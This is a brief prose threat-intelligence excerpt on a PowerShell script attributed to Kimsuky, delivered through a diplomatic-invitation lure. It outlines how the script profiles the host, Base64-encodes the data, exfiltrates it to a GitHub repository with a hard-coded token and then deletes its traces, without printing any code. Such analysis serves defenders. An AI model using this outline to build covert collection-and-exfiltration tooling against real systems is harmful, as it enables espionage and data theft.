The excerpt attributes an OFX text-stage script from the “Update Schedule_INVITATION - 250625 UNC Ambassador's Roundtable” archive to Kimsuky activity using a diplomatic-themed lure. The PowerShell collects host profiling data, including the first network adapter IP address, timestamp, last boot time, OS and system details, process listings, and potentially antivirus product information. It writes the collected data under %APPDATA% using an IP-and-time-based filename, Base64-encodes the file, and uploads it to the landjhon/world GitHub repository through the GitHub Contents API. The script uses light string-splitting obfuscation, a hard-coded GitHub personal access token, and deletes the local artifact after upload, showing SaaS-based data exfiltration and cleanup.